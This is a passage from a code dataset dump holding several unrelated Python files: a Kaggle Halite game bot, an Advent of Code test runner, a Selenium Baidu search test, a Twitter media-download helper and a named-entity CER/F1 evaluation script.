"logging.warning", "line_number": 165, "usage_type": "call"}]} +{"seq_id": "412009887", "text": "# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %% [markdown]\n# # Execution environment\n\n# %%\nprint(\"Import started\")\nfrom kaggle_environments import make\nfrom kaggle_environments.envs.halite.helpers import *\nimport random\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\nfrom queue import PriorityQueue\nprint(\"Import ended\")\n\n# %% [markdown]\n# # Test Environment\n\n# %%\nenvironment = make(\"halite\", configuration={\"size\": 21, \"startingHalite\": 25000}, debug=True)\nagent_count = 4\nenvironment.reset(agent_count)\nstate = environment.state[0]\nboard = Board(state.observation, environment.configuration)\n\n# %% [markdown]\n# # Framework\n# \n# ## Static\n# Static\n# \n# ## Navigation\n# Contains helper functions related to *Points* and *Movement*\n# \n# #### State variables\n# \n# self.next: Numpy array of (SIZE,SIZE) boolean encoded ally unit position on next turn.\n# \n# #### Methods\n# \n# safeMoveTo: \n# A* \"safe\" movement\n# \n# dist: \n# distance between two Points\n# \n# directionTo:\n# returns ShipAction. From start to end\n# \n# ## Calculator\n# Encodes *Board* to numpy array and runs most computationally intensive calculations and heuristics.\n# \n# #### Methods\n# \n# Update: Runs every turn. A pipeline for all calculations.\n# Encode: encodes a board into numpy arrays:\n# \n# #### States\n# \n# shipMap,shipyardMap: \n# 4D tensor, each dimension a matrix boolean encoding ship/shipyards of a single player (the dimension)\n# \n# haliteMap: \n# Matrix of haliteMap\n# \n# enemyShipHalite: \n# Matrix of enemyShips, encoded by amount of Halite. Used to threshold.\n# \n# ally: \n# My ships.\n# \n# controlMap: \n# Heuristic of map control and domination.\n# \n# \n# \n\n# %%\n# Static\nnav, calc = None, None\n\n#TODO: Move CFG to static?\n\n\nclass Navigation:\n\n # Helper\n def __init__(self, board: Board):\n self.CFG = board.configuration\n\n def dist(self, a: Point, b: Point) -> int:\n return min(abs(a.x - b.x), self.CFG.size - abs(a.x - b.x)) + min(abs(a.y - b.y), self.CFG.size - abs(a.y - b.y))\n\n def directionTo(self, s: Point, t: Point) -> ShipAction:\n candidate = [] # [N/S, E/W]\n if s.x - t.x != 0:\n candidate.append(ShipAction.WEST if (s.x - t.x) % self.CFG.size < (t.x - s.x) % self.CFG.size else ShipAction.EAST)\n if s.y - t.y != 0:\n candidate.append(ShipAction.SOUTH if (s.y - t.y) % self.CFG.size < (t.y - s.y) % self.CFG.size else ShipAction.NORTH)\n return random.choice(candidate) if len(candidate) > 0 else None\n\n def unpack(self, n):\n return Point(n // self.CFG.size, n % self.CFG.size)\n\n # Navigation\n def update(self):\n self.next = np.zeros((self.CFG.size,self.CFG.size))\n \n\n def safeMoveTo(self, s : Ship, t : Point): #A* Movement. Suggested move by priority.\n\n sPos = s.position\n\n #1. Obstacle Calculation\n\n #Obstacle are \"walls\" on the nav graph. Consist of the points of\n #Enemy ships with less halite (threshold => enemy block)\n #Enemy shipyards \n #Position of friendly on next turn\n\n #2. Navigation\n\n #A* \n\n #sPos: start position\n #pred: predecessor of a node. (Which point was relaxed to find next point)\n #dist: distance from sPos to point\n #pqMap: maps distances in priority queue to process points \n #t: initally target point. During reconstruction, becomes \"next\" point in A* path\n \n \n #algorithm: starts from sPos, put in priority queue.\n #While priority queue is not empty and target is not found, relax next node in queue.\n #Add adjacent (processPoints) to pq.\n\n #Check if t is reachable (pred not None)\n #If it is, loop back pred until reached sPos to find path.\n #Else, move randomly.\n \n\n #Swapping\n #If bot wishes to stay still but cannot (self.next turn ally boat moves in)\n #Move randomly\n #This means that if the bot has a goal, it will move toward the goal. This includes friendly\n #As obstacles are calculated through self.next.\n #Because movement is sorted in priority, higher priority ships will never get blocked \n #By lower priority.\n\n\n threshold = s.halite\n enemyBlock = np.where(calc.enemyShipHalite <= threshold, 1, 0)\n enemyBlock = enemyBlock + calc.enemyShipyard\n blocked = self.next + enemyBlock\n blocked = np.where(blocked>0,1,0)\n #TODO: Improve obstacle calculation\n\n #Stay still\n if sPos == t:\n #Someone with higher priority needs position, must move\n if self.next[t.x][t.y]:\n for offX, offY in ((0,1),(1,0),(0,-1),(-1,0)):\n processPoint = sPos.translate(Point(offX,offY),self.CFG.size)\n if not blocked[processPoint.x][processPoint.y]:\n self.next[processPoint.x][processPoint.y] = 1\n return self.directionTo(sPos,processPoint)\n self.next[sPos.x][sPos.y] = 1\n return None\n else:\n self.next[sPos.x][sPos.y] = 1\n return None\n\n #A*\n pred = {}\n dist = {}\n pq = PriorityQueue()\n pqMap = {}\n\n pqMap[self.dist(sPos,t)] = [sPos]\n pq.put(self.dist(sPos,t))\n pred[sPos] = sPos\n dist[sPos] = self.dist(sPos,t)\n\n # Main\n\n while not pq.empty():\n if t in dist:\n break\n currentPoint = pqMap.get(pq.get()).pop()\n for offX, offY in ((0,1),(1,0),(0,-1),(-1,0)):\n processPoint = currentPoint.translate(Point(offX,offY),self.CFG.size)\n if blocked[processPoint.x][processPoint.y] or processPoint in dist: \n continue\n dist[processPoint] = dist[currentPoint] + 1\n priority = dist[processPoint] + self.dist(processPoint,t)\n pqMap[priority] = pqMap.get(priority,[])\n pqMap[priority].append(processPoint)\n pq.put(priority)\n pred[processPoint] = currentPoint\n \n #TODO: Catch this exception. Or make sure this never happens. Don't just move randomly.\n if not t in pred:\n #Random move\n block = 0\n for offX, offY in ((0,1),(1,0),(0,-1),(-1,0)):\n processPoint = sPos.translate(Point(offX,offY),self.CFG.size)\n if not blocked[processPoint.x][processPoint.y]:\n self.next[processPoint.x][processPoint.y] = 1\n return self.directionTo(sPos,processPoint)\n self.next[sPos.x][sPos.y] = 1\n return None\n\n # Path reconstruction\n while pred[t] != sPos:\n t = pred[t]\n\n desired = self.directionTo(sPos,t)\n self.next[t.x][t.y] = 1\n # Swapping\n if calc.ally[t.x][t.y]:\n self.next[t.x][t.y] = 1\n pass\n \n return desired\n\nclass Calculator:\n\n def __init__(self, board: Board):\n self.CFG = board.configuration\n self.me = board.current_player_id\n print(self.me)\n self.playerNum = len(board.players)\n\n def update(self, board: Board):\n # Updates\n self.board = board\n\n # Encoding\n self.encode()\n\n # Calculate\n self.haliteMean = np.mean(self.haliteMap, axis=None)\n self.ally = self.shipMap[self.me]\n self.allyShipyard = self.shipyardMap[self.me]\n self.enemy = np.sum(self.shipMap, axis=0) - self.ally\n self.enemyShipyard = np.sum(self.shipyardMap, axis=0) - self.allyShipyard\n self.enemyShipHaliteMap()\n\n # Encodes halite and units to matrices\n def encode(self) -> dict:\n # Map\n self.haliteMap = np.zeros((self.CFG.size, self.CFG.size))\n self.shipMap = np.zeros((self.playerNum, self.CFG.size, self.CFG.size))\n self.shipyardMap = np.zeros((self.playerNum, self.CFG.size, self.CFG.size))\n for cell in self.board.cells.values():\n self.haliteMap[cell.position.x][cell.position.y] = cell.halite\n for ship in self.board.ships.values():\n self.shipMap[ship.player_id][ship.position.x][ship.position.y] = 1\n for shipyard in self.board.shipyards.values():\n self.shipyardMap[shipyard.player_id][shipyard.position.x][shipyard.position.y] = 1\n\n # TODO: Add encoding for individual ships and yards (not necessary now)\n \n # Calculations\n \n def enemyShipHaliteMap(self):\n self.enemyShipHalite = np.zeros((self.CFG.size, self.CFG.size))\n self.enemyShipHalite += np.Infinity\n for ship in self.board.ships.values():\n if ship.player_id != self.me:\n self.enemyShipHalite[ship.position.x][ship.position.y] = ship.halite\n\n def controlMap(self): # TODO: rename or refactor\n # TODO: Consider enemyShipHalite and shipyards\n self.controlMap = self.ally - self.enemy\n # TODO: avg pooling\n \n \n\n# %% [markdown]\n# # Agent\n\n# %%\ndef cost(ship, cell):\n # TODO: much to improve\n # We can probably RL this\n cfg = environment.configuration\n haliteCoef = cfg.size / cfg.maxCellHalite\n return nav.dist(ship.position, cell.position) - haliteCoef * cell.halite\n\n@board_agent\ndef agent(board):\n global nav, calc\n\n if board.step == 0:\n init = True\n nav = Navigation(board)\n calc = Calculator(board)\n\n # Process map\n calc.update(board)\n nav.update()\n ships = board.current_player.ships\n shipyards = board.current_player.shipyards\n\n # Decide tasks \n # (priority,ship,targetLocation, type)\n action = {}\n miningCells = calc.haliteMap\n\n # Terrible mining algorithm, should probably come up with something entirely new\n assign = []\n for i, ship in enumerate(ships):\n if ship.cell.halite >= calc.haliteMean:\n action[ship] = (900,ship,ship.cell.position,\"mining\")\n else:\n if ship.halite > 500 and len(shipyards) > 0:\n action[ship] = (1000,ship,shipyards[0].position,\"return\")\n else:\n assign.append(ship)\n\n miningCells = np.argpartition(miningCells, -len(assign),axis=None)[-len(assign):]\n miningCells = miningCells.tolist()\n miningCells = [board.cells[nav.unpack(i)] for i in miningCells]\n\n costMatrix = np.array([[cost(ship, cell) for ship in assign] for cell in miningCells])\n tasks, _ = linear_sum_assignment(costMatrix)\n for i, ship in enumerate(assign):\n action[ship] = (500-cost(ship,miningCells[tasks[i]]),ship,miningCells[tasks[i]].position,\"mining\")\n\n\n # Action process\n action = list(action.values())\n action.sort(reverse=True,key=lambda x : x[0])\n for i in action:\n i[1].next_action = nav.safeMoveTo(i[1],i[2])\n\n if len(shipyards) == 0:\n ships[0].next_action = ShipAction.CONVERT\n for shipyard in shipyards:\n if shipyard.cell.ship is None and not nav.next[shipyard.cell.position.x][shipyard.cell.position.y]:\n shipyard.next_action = ShipyardAction.SPAWN\n\n# %% [markdown]\n# # Run\n", "sub_path": "old/py/bot0.2.py", "file_name": "bot0.2.py", "file_ext": "py", "file_size_in_byte": 11385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "kaggle_environments.make", "line_number": 23, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 157, "usage_type": "call"}, {"api_name": "queue.PriorityQueue", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.Infinity", "line_number": 270, "usage_type": "attribute"}, {"api_name": "numpy.argpartition", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "scipy.optimize.linear_sum_assignment", "line_number": 329, "usage_type": "call"}]} +{"seq_id": "113595191", "text": "import json\nfrom time import time\n\nwith open(\"solutions.json\") as fp:\n solutions = json.load(fp)\n\ndef check(day):\n with open(f\"days/day{day}.txt\") as fp:\n data = [x.strip() for x in fp.readlines()]\n with open(f\"days/day{day}.py\") as fp:\n new_globals = globals().copy()\n exec(fp.read(), new_globals)\n impls = new_globals[\"implementations\"]\n if len(impls) == 1:\n print(f\"\\033[1mDay {day}: 1 implementation found.\\033[0m\")\n else:\n print(f\"\\033[1mDay {day}: {len(impls)} implementations found.\\033[0m\")\n s_1, s_2 = solutions[day - 1]\n for i, impl in enumerate(impls):\n t = time()\n p_1, p_2 = impl(data)\n dt = time() - t\n count = int(0.5 / (dt + 0.01)) + 1\n total = 0\n for _ in range(count):\n t = time()\n impl(data)\n dt = time() - t\n total += dt\n mean = total / count\n print(f\"Implementation {i + 1} took {mean:.3} s:\")\n if p_1 == s_1:\n print(f\"- Part 1 \\033[32;40;1mpassed\\033[0m (got {p_1})\")\n else:\n print(f\"- Part 1 \\033[31;40;1mfailed\\033[0m (expected {s_1}, got {p_1})\")\n if p_2 == s_2:\n print(f\"- Part 2 \\033[32;40;1mpassed\\033[0m (got {p_2})\")\n else:\n print(f\"- Part 2 \\033[31;40;1mfailed\\033[0m (expected {s_2}, got {p_2})\")\n\nday = input(\"Day to solve (omit to solve all): \").strip()\n\nif not day:\n try:\n for i in range(25):\n check(i + 1)\n except FileNotFoundError:\n print(\"No more days found.\")\nelse:\n check(int(day))", "sub_path": "aoc.py", "file_name": "aoc.py", "file_ext": "py", "file_size_in_byte": 1694, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 22, "usage_type": "call"}, {"api_name": "time.time", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "431603903", "text": "# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport unittest, time, re # 导入模块\n\n# 初始化\nclass BaiduTest(unittest.TestCase): \n\tdef setUp(self):\n\t\tself.driver = webdriver.Chrome() # 浏览器\n\t\tself.driver.implicitly_wait(30) # 隐形等待时间\n\t\tself.base_url = \"https://www.baidu.com/\" # 路由\n\t\tself.vertificationErrors = [] # 脚步运行的错误信息数组\n\t\tself.accept_next_alert = True # 是否接受下一个弹窗\n\n\tdef test_baidu(self):\n\t\tdriver = self.driver\n\t\tdriver.get(self.base_url + \"/\")\n\t\tdriver.find_element_by_id(\"kw\").clear()\n\t\tdriver.find_element_by_id(\"kw\").send_keys(\"selenium ide\")\n\t\tdriver.find_element_by_id(\"su\").click()\n\n\tdef is_element_present(self, how, what): # how-定位方法, what-定位值\n\t\ttry: # 异常处理\n\t\t\tself.driver.find_element_by_id(by=how, value=what)\n\t\texcept NoSuchElementException:\n\t\t\treturn False\n\t\treturn True\n\n\tdef is_alert_present(self):\n\t\ttry:\n\t\t\tself.driver.switch_to_alter() # 捕捉窗口的alert弹窗\n\t\texcept NoAlertPresentException:\n\t\t\treturn False\n\t\treturn True\n\n\tdef close_alter_and_get_its_text(self):\n\t\ttry:\n\t\t\talert = self.driver.switch_to_alter()\n\t\t\talert_text = alert.text # 获取当前页面的警告提示信息\n\t\t\tif self.accept_next_alert:\n\t\t\t\talert.accept()\n\t\t\telse:\n\t\t\t\talert.dismiss()\n\t\t\treturn alert_text\n\t\tfinally:\n\t\t\tself.accept_next_alert = True\n\n\tdef tearDown(self): # 清理工作\n\t\tself.driver.quit() # 退出浏览器\n\t\tself.assertEqual([], self.vertificationErrors)\n\nif __name__ == \"__main__\":\n\tunittest.main()", "sub_path": "10baidu.py", "file_name": "10baidu.py", "file_ext": "py", "file_size_in_byte": 1796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoAlertPresentException", "line_number": 36, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "323364191", "text": "# coding:utf-8\n\nfrom requests_oauthlib import OAuth1Session\nfrom configparser import ConfigParser\nfrom time import sleep\nimport json\nimport os\nimport sys\nimport urllib\nimport Consts\n\n\ncounter_image = 0\ncounter_video = 0\nroot_image = \"images/\"\nroot_video = \"videos/\"\npage_size = 200\n\ncfg = ConfigParser()\ncfg.read(Consts.configFile)\ntoken = cfg[\"token\"]\nscreen_name = cfg[\"account\"][\"screen_name\"]\noath_keys = {\n \"consumer_key\": token[Consts.CK],\n \"cousumer_secret\": token[Consts.CS],\n \"access_token\": token[Consts.AT],\n \"access_token_secret\": token[Consts.ATS]\n}\n\n\ndef craete_oath_session():\n return OAuth1Session(\n token[Consts.CK],\n token[Consts.CS],\n token[Consts.AT],\n token[Consts.ATS]\n )\n\n\n\"\"\"\nTweetをとってくるメソッドの\n\"\"\"\n\n\ndef access_api(url, params):\n sleep(1)\n oath = craete_oath_session()\n res = oath.get(url, params=params)\n if res.status_code != 200:\n print(\"Error : {0}\".format(res.status_code))\n return None\n return json.loads(res.text)\n\n\n\"\"\"\nブロックしているユーザーのリストをとってくる\n\"\"\"\n\n\ndef get_block_list(skip_status=True, cursor=-1):\n url = \"https://api.twitter.com/1.1/blocks/ids.json\"\n params = {\n \"skip_status\": skip_status,\n \"cursor\": cursor\n }\n oath = craete_oath_session()\n res = oath.get(url, params=params)\n if res.status_code != 200:\n print(\"Error : {0}\".format(res.status_code))\n return None\n return json.loads(res.text)\n\n\n\"\"\"\nユーザーの情報をとってくる\n\"\"\"\n\n\ndef get_user_info(id, include_entities=False):\n url = \"https://api.twitter.com/1.1/users/show.json\"\n params = {\n \"user_id\": id,\n \"include_entities\": include_entities\n }\n return access_api(url, params)\n\n\n\"\"\"\nユーザーidからツイートをとってくる\n\"\"\"\n\n\ndef get_tweet(id):\n url = \"https://api.twitter.com/1.1/statuses/show.json\"\n params = {\n \"id\": id,\n \"include_entities\": 1,\n \"tweet_mode\": \"extended\"\n }\n return access_api(url, params)\n\n\n\"\"\"\nユーザーのtweetリストをとってくる\n\"\"\"\n\n\ndef get_user_timeline(page, screen_name):\n url = \"https://api.twitter.com/1.1/statuses/user_timeline.json\"\n params = {\n \"screen_name\": screen_name,\n \"page\": page,\n \"count\": page_size,\n \"include_entities\": 1,\n \"tweet_mode\": \"extended\"\n }\n return access_api(url, params)\n\n\n\"\"\"\nユーザーのfav画像をとってくる\n\"\"\"\n\n\ndef get_favorite_tweets(page, screen_name):\n url = \"https://api.twitter.com/1.1/favorites/list.json?\"\n params = {\n \"screen_name\": screen_name,\n \"page\": page,\n \"count\": page_size,\n \"include_entities\": 1,\n \"tweet_mode\": \"extended\"\n }\n return access_api(url, params)\n\n\n\"\"\"\nTwitterのtweetリストから画像と動画を保存する\nすでにあるものは無視\n\"\"\"\n\n\ndef save_media(save_account, tweets):\n global counter_image # 保存した画像の数\n global counter_video # 保存した動画の数\n for tw in tweets: # 全ツイートを処理\n try:\n media = tw[\"extended_entities\"][\"media\"] # 画像・動画オブジェクトの取得\n for media_path in media:\n if media_path[\"type\"] == \"photo\": # 画像の時\n save_path = \"./\" + save_account + \"/\" + \\\n root_image + tw[\"user\"][\"screen_name\"]\n # ツイート主用のディレクトリがなければ作成\n os.makedirs(save_path, exist_ok=True)\n url = media_path[\"media_url\"]\n url_large = url + \":large\"\n save_file_path = save_path + \"/\" + os.path.basename(url)\n if os.path.exists(save_file_path):\n print(\"skip image : {url}\".format(url=save_file_path))\n break\n with open(save_file_path, \"wb\") as f:\n img = urllib.request.urlopen(\n url_large, timeout=20).read()\n f.write(img)\n counter_image += 1\n print(\"saved image [{num: 4d}] : {url}\".format(\n num=counter_image, url=save_file_path))\n\n elif media_path[\"type\"] == \"video\" or media_path[\"type\"] == \"animated_gif\": # 動画の時\n save_path = \"./\" + save_account + \"/\" + \\\n root_video + tw[\"user\"][\"screen_name\"]\n # ツイート主用のディレクトリがなければ作成\n os.makedirs(save_path, exist_ok=True)\n # 動画の中でbitrateが最大のmp4動画のurlを得る\n url = max([i for i in media_path[\"video_info\"][\"variants\"]\n if i[\"content_type\"] == \"video/mp4\"], key=lambda e: e[\"bitrate\"])[\"url\"]\n # 保存URLの生成 パラメータ削除\n save_file_path = (save_path + \"/\" +\n os.path.basename(url)).split(\"?\")[0]\n if os.path.exists(save_file_path):\n print(\"skip video : {url}\".format(url=save_file_path))\n break\n with open(save_file_path, \"wb\") as f:\n vdo = urllib.request.urlopen(url, timeout=180).read()\n f.write(vdo)\n counter_video += 1\n print(\"saved video [{num: 4d}] : {url}\".format(\n num=counter_video, url=save_file_path))\n\n except (KeyError, ValueError)as e:\n pass\n\n except urllib.error.HTTPError:\n with open(\"Error.txt\", \"a\") as f:\n f.write(\"HTTP error : \" + url)\n\n\n\"\"\"\n指定のユーザーのfavTweetをとってきて\nメディアを保存するメソッドに投げる\n\"\"\"\n\n\ndef get_medias(end):\n for i in range(0, end):\n for j in screen_name.split(\",\"):\n save_media(j, get_favorite_tweets(i+1, j))\n print(\"saved {num} images\".format(num=counter_image))\n print(\"saved {num} videos\".format(num=counter_video))\n\n\ndef update_profile(description, name):\n url = \"https://api.twitter.com/1.1/account/update_profile.json?\"\n params = {\n \"name\": name,\n \"description\": description\n }\n oath = craete_oath_session()\n res = oath.post(url, params=params)\n if res.status_code != 200:\n print(\"Error : {0}\".format(res.status_code))\n return None\n return json.loads(res.text)\n", "sub_path": "TwitterAPI.py", "file_name": "TwitterAPI.py", "file_ext": "py", "file_size_in_byte": 6626, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "configparser.ConfigParser", "line_number": 19, "usage_type": "call"}, {"api_name": "Consts.configFile", "line_number": 20, "usage_type": "attribute"}, {"api_name": "Consts.CK", "line_number": 24, "usage_type": "attribute"}, {"api_name": "Consts.CS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "Consts.AT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Consts.ATS", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests_oauthlib.OAuth1Session", "line_number": 32, "usage_type": "call"}, {"api_name": "Consts.CK", "line_number": 33, "usage_type": "attribute"}, {"api_name": "Consts.CS", "line_number": 34, "usage_type": "attribute"}, {"api_name": "Consts.AT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "Consts.ATS", "line_number": 36, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 52, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 162, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 184, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 184, "usage_type": "attribute"}, {"api_name": "urllib.error", "line_number": 193, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "492024309", "text": "import re\nimport Levenshtein\n\n# PER '|' , LOC '$' , ORG '{'\n\ndef get_cer(tar, pred):\n for x in '$|{]':\n tar.replace(x, '')\n pred.replace(x, '')\n\n return Levenshtein.distance(tar, pred), len(tar)\n\n\ndef get_ne_cer(tar, pred):\n distance = 0\n length = 0\n\n for t, p in zip(tar, pred):\n t = t.replace(' ', '')\n p = p.replace(' ', '')\n\n if len(tar) == len(pred):\n for t, p in zip(tar, pred):\n distance += Levenshtein.distance(t, p)\n length += len(t)\n\n elif len(tar) < len(pred):\n for t in tar:\n distance += min(map(lambda x: Levenshtein.distance(t, x), pred))\n length += len(t)\n\n elif len(tar) > len(pred):\n for p in pred:\n candidates = list(map(lambda x: Levenshtein.distance(p, x), tar))\n optimal = min(candidates)\n distance += optimal\n length += len(tar[candidates.index(optimal)])\n\n return distance, length\n\n\ndef get_f1_precision(tar, pred):\n if len(pred) == 0:\n return 0, 0\n if len(tar) == 0:\n return 0, len(pred)\n\n count = 0\n for p in pred:\n if min(map(lambda x: Levenshtein.distance(p, x), tar)) <= 1:\n count += 1\n\n return count, len(pred)\n\n\ndef get_f1_recall(tar, pred):\n if len(pred) == 0:\n return 0, len(tar)\n if len(tar) == 0:\n return 0, 0\n\n count = 0\n for t in tar:\n if min(map(lambda x: Levenshtein.distance(t, x), pred)) <= 1:\n count += 1\n\n return count, len(tar)\n\n\n# ---------- read data -----------\nf = open(\"E2E/TEST/true_transcripts.txt\", 'rt', encoding=\"cp949\")\nf2 = open(\"E2E/TEST/predictions.txt\", 'rt', encoding=\"utf8\")\n\ntargets = f.readlines()\npredictions = f2.readlines()\n\npredictions = [line.split('\\t')[1] for i, line in enumerate(predictions) if line.split('\\t')[0] == targets[i]]\n\n# ---------- statistics ----------\n\n# CER\ntotal_distance = 0\ntotal_length = 0\n\nne_distance = 0\nne_length = 0\n\nper_distance = 0\nper_length = 0\n\nloc_distance = 0\nloc_length = 0\n\norg_distance = 0\norg_length = 0\n\nper_cnt = 0\nloc_cnt = 0\norg_cnt = 0\n\n# F1\nprecision_cnt = 0\nprecision_len = 0\nrecall_cnt = 0\nrecall_len = 0\n\nper_precision_cnt = 0\nper_precision_len = 0\nper_recall_cnt = 0\nper_recall_len = 0\n\nloc_precision_cnt = 0\nloc_precision_len = 0\nloc_recall_cnt = 0\nloc_recall_len = 0\n\norg_precision_cnt = 0\norg_precision_len = 0\norg_recall_cnt = 0\norg_recall_len = 0\n\nfor target, prediction in zip(targets, predictions):\n # -------------- check CER ---------------\n PER = re.findall('\\|.*?(\\n|]| .*? )', target)\n LOC = re.findall('\\$.*?(\\n|]| .*? )', target)\n ORG = re.findall('\\{.*?(\\n|]| .*? )', target)\n\n P_PER = re.findall('\\|.*?(\\n|]| .*? )', prediction)\n P_LOC = re.findall('\\$.*?(\\n|]| .*? )', prediction)\n P_ORG = re.findall('\\{.*?(\\n|]| .*? )', prediction)\n\n dist, length = get_cer(target, prediction)\n total_distance += dist\n total_length += length\n\n dist, length = get_ne_cer(PER + LOC + ORG, P_PER + P_LOC + P_ORG)\n ne_distance += dist\n ne_length += length\n\n dist, length = get_ne_cer(PER, P_PER)\n per_distance += dist\n per_length += length\n\n dist, length = get_ne_cer(LOC, P_LOC)\n loc_distance += dist\n loc_length += length\n\n dist, length = get_ne_cer(ORG, P_ORG)\n org_distance += dist\n org_length += length\n\n per_cnt += len(P_PER)\n loc_cnt += len(P_LOC)\n org_cnt += len(P_ORG)\n\n # --------------- check F1 ---------------\n p_cnt, p_len = get_f1_precision(PER + LOC + ORG, P_PER + P_LOC + P_ORG)\n r_cnt, r_len = get_f1_recall(PER + LOC + ORG, P_PER + P_LOC + P_ORG)\n precision_cnt += p_cnt\n precision_len += p_len\n recall_cnt += r_cnt\n recall_len += r_len\n print('***')\n print(recall_cnt)\n print(recall_len)\n\n per_p_cnt, per_p_len = get_f1_precision(PER, P_PER)\n per_r_cnt, per_r_len = get_f1_recall(PER, P_PER)\n per_precision_cnt += per_p_cnt\n per_precision_len += per_p_len\n per_recall_cnt += per_r_cnt\n per_recall_len += per_r_len\n\n loc_p_cnt, loc_p_len = get_f1_precision(LOC, P_LOC)\n loc_r_cnt, loc_r_len = get_f1_recall(LOC, P_LOC)\n loc_precision_cnt += loc_p_cnt\n loc_precision_len += loc_p_len\n loc_recall_cnt += loc_r_cnt\n loc_recall_len += loc_r_len\n\n org_p_cnt, org_p_len = get_f1_precision(ORG, P_ORG)\n org_r_cnt, org_r_len = get_f1_recall(ORG, P_ORG)\n org_precision_cnt += org_p_cnt\n org_precision_len += org_p_len\n org_recall_cnt += org_r_cnt\n org_recall_len += org_r_len\n\nprint('------------------TEST RESULTS-------------------')\nprint('validation set size: {:d}'.format(len(targets)))\n\nprint('\\ntotal CER: {:.3f}'.format(total_distance / total_length))\n\nprint('\\n-- tags: {:d}'.format(per_cnt + loc_cnt + org_cnt))\nprint('named-entity CER: {:.3f}'.format(ne_distance / ne_length))\n\nprecision = precision_cnt / precision_len\nrecall = recall_cnt / recall_len\nprint('\\nF1 score: {:.3f}'.format(2 * precision * recall / (precision + recall)))\nprint('precision: {:.3f}'.format(precision))\nprint('recall: {:.3f}'.format(recall))\n\nprint('\\n-- PER tags: {:d}'.format(per_cnt))\nif per_cnt > 0:\n per_precision = per_precision_cnt / per_precision_len\n per_recall = per_recall_cnt / per_recall_len\n print('PER tag CER: {:.3f}'.format(per_distance / per_length))\n print('\\nPER F1 score: {:.3f}'.format(2 * per_precision * per_recall / (per_precision + per_recall)))\n print('PER precision: {:.3f}'.format(per_precision))\n print('PER recall: {:.3f}'.format(per_recall))\n\nprint('\\n-- LOC tags: {:d}'.format(loc_cnt))\nif loc_cnt > 0:\n loc_recall = loc_recall_cnt / loc_recall_len\n loc_precision = loc_precision_cnt / loc_precision_len\n print('LOC tag CER: {:.3f}'.format(loc_distance / loc_length))\n print('\\nLOC F1 score: {:.3f}'.format(2 * loc_precision * loc_recall / (loc_precision + loc_recall)))\n print('LOC precision: {:.3f}'.format(loc_precision))\n print('LOC recall: {:.3f}'.format(loc_recall))\n\nprint('\\n-- ORG tags: {:d}'.format(org_cnt))\nif org_cnt > 0:\n org_precision = org_precision_cnt / org_precision_len\n org_recall = org_recall_cnt / org_recall_len\n print('ORG tag CER: {:.3f}'.format(org_distance / org_length))\n print('\\nORG F1 score: {:.3f}'.format(2 * org_precision * org_recall / (org_precision + org_recall)))\n print('ORG precision: {:.3f}'.format(org_precision))\n print('ORG recall: {:.3f}'.format(org_recall))\n", "sub_path": "TEST.py", "file_name": "TEST.py", "file_ext": "py", "file_size_in_byte": 6421, 